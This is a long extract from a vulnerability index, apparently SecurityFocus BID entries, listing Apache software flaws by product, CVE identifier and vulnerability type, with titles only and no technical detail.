6834| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
6835| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
6836| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
6837| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
6838| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
6839| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
6840| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
6841| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
6842| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
6843| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
6844| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
6845| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
6846| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
6847| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
6848| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
6849| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
6850| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
6851| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
6852| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
6853| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
6854| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
6855| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
6856| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
6857| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
6858| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
6859| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
6860| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
6861| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
6862| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
6863| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
6864| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
6865| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
6866| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
6867| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
6868| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
6869| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
6870| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
6871| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
6872| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
6873| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
6874| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
6875| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
6876| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
6877| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
6878| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
6879| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
6880| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
6881| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
6882| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
6883| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
6884| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
6885| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
6886| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
6887| [95675] Apache Struts Remote Code Execution Vulnerability
6888| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
6889| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
6890| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
6891| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
6892| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
6893| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
6894| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
6895| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
6896| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
6897| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
6898| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
6899| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
6900| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
6901| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
6902| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
6903| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
6904| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
6905| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
6906| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
6907| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
6908| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
6909| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
6910| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
6911| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
6912| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
6913| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
6914| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
6915| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
6916| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
6917| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
6918| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
6919| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
6920| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
6921| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
6922| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
6923| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
6924| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
6925| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
6926| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
6927| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
6928| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
6929| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
6930| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
6931| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
6932| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
6933| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
6934| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
6935| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
6936| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
6937| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
6938| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
6939| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
6940| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
6941| [91736] Apache XML-RPC Multiple Security Vulnerabilities
6942| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
6943| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
6944| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
6945| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
6946| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
6947| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
6948| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
6949| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
6950| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
6951| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
6952| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
6953| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
6954| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
6955| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
6956| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
6957| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
6958| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
6959| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
6960| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
6961| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
6962| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
6963| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
6964| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
| [90482] Apache CVE-2004-1387 Local Security Vulnerability
| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
| [86399] Apache CVE-2007-1743 Local Security Vulnerability
| [86397] Apache CVE-2007-1742 Local Security Vulnerability
| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
